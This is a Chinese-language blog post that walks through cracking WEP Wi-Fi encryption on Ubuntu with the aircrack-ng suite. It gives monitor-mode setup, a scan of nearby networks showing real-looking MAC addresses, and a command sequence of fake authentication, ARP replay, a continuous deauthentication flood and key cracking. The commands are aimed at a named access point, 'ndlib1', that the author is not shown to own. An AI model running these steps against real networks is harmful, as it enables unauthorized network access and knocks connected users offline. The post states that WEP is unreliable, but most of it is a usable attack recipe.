記一次 WEP 加密破解 (Ubuntu / Aircrack-ng)

Posted on Comments:

先說結論: WEP 加密方式一點都不可靠。

先把無線網卡設定為 monitor mode

1
2
3
~# ifconfig wlan0 down
~# iwconfig wlan0 mode monitor
~# ifconfig wlan0 up
1
~# sudo airmon-ng start wlan0 *channel number*

wifi 的 channel number 可以透過 inSSiDer 之類的軟體取得

1
2
3
mon0            Unknown         iwlwifi - [phy0]
wlan0           Unknown         iwlwifi - [phy0]
                                (monitor mode enabled on mon1)

接著 ifconfig 會多出一張 mon0 的網卡

或者可以用下面指令檢查

1
~# sudo airmon-ng

會出現:

1
2
3
4
5
Interface       Chipset         Driver

mon0            Unknown         iwlwifi - [phy0]
wlan0           Unknown         iwlwifi - [phy0]
mon1            Unknown         iwlwifi - [phy0]

重點就是 mon* 網卡,之後 crack 都需要用到 mon 網卡。

1
~# sudo iwconfig mon0 channel **channel number**

將 mon0 網卡的 channel 設定為指定的 channel number (其實就是要 crack 的 AP 所屬的 channel)

接著利用 airodump-ng 來掃描網路環境

1
~# sudo airodump-ng mon0

會出現下方類似的畫面

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
CH -1 ][ Elapsed: 0 s ][ 2016-08-17 16:49                                         
                                                                                                                                    
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                      
                                                                                                                                    
82:01:84:F1:F5:D3  -78        5        0    0   1  54e. WPA2 CCMP   PSK  s                                                          
36:08:04:27:90:5C  -52       30       42   10   1  54e  OPN              NewTaipei                                                  
34:08:04:27:90:5C  -53       29      104   17   1  54e. OPN              iTaiwan                                                    
00:0A:79:CC:0C:47  -68       24      126   39   1  54e. WEP  WEP         ndlib1                                                     
                                                                                                                                    
BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                           
                                                                                                                                     
34:08:04:27:90:5C  D4:0B:1A:F6:A9:A0  -49   54e-54e   374       67                                                                   
00:0A:79:CC:0C:47  88:32:9B:D4:47:2B  -69   24e- 1     29      179                                                                   
00:0A:79:CC:0C:47  84:3A:4B:32:A1:CA    0    2e-48e     0      141                                                                   
00:0A:79:CC:0C:47  FC:FC:48:AF:02:CB  -44   48e-24   2143       11

重點有

BSSID(Mac Address) / CH(channel) / ENC / CIPHER / ESSID(SSID)

先確認目標 ENC / CIPHER 是不是 WEP / WEP 是的話就先恭喜了,代表目標 AP 加密方式為 WEP。

接下來縮小範圍

1
~# sudo airodump-ng --channel 1 mon0

我們的目標是 00:0A:79:CC:0C:47 ndlib1

1
2
3
4
5
sudo aireplay-ng --fakeauth 0 -a 00:0A:79:CC:0C:47 -e ndlib1 mon0
sudo airodump-ng --channel 1 -w ~/Temp/crack/crackwepwifi -i mon0
sudo aireplay-ng -3 -b 00:0A:79:CC:0C:47 mon0
sudo aireplay-ng --deauth 0 -a 00:0A:79:CC:0C:47 mon0
sudo aircrack-ng -0 -b 00:0A:79:CC:0C:47 ~/Temp/crack/crackwepwifi-02.ivs

Reference

http://www.king-foo.com/2010/05/hacking-wep-encryption-on-ubuntu/
BT3 - iwconfig: device or resource busy
how to change channel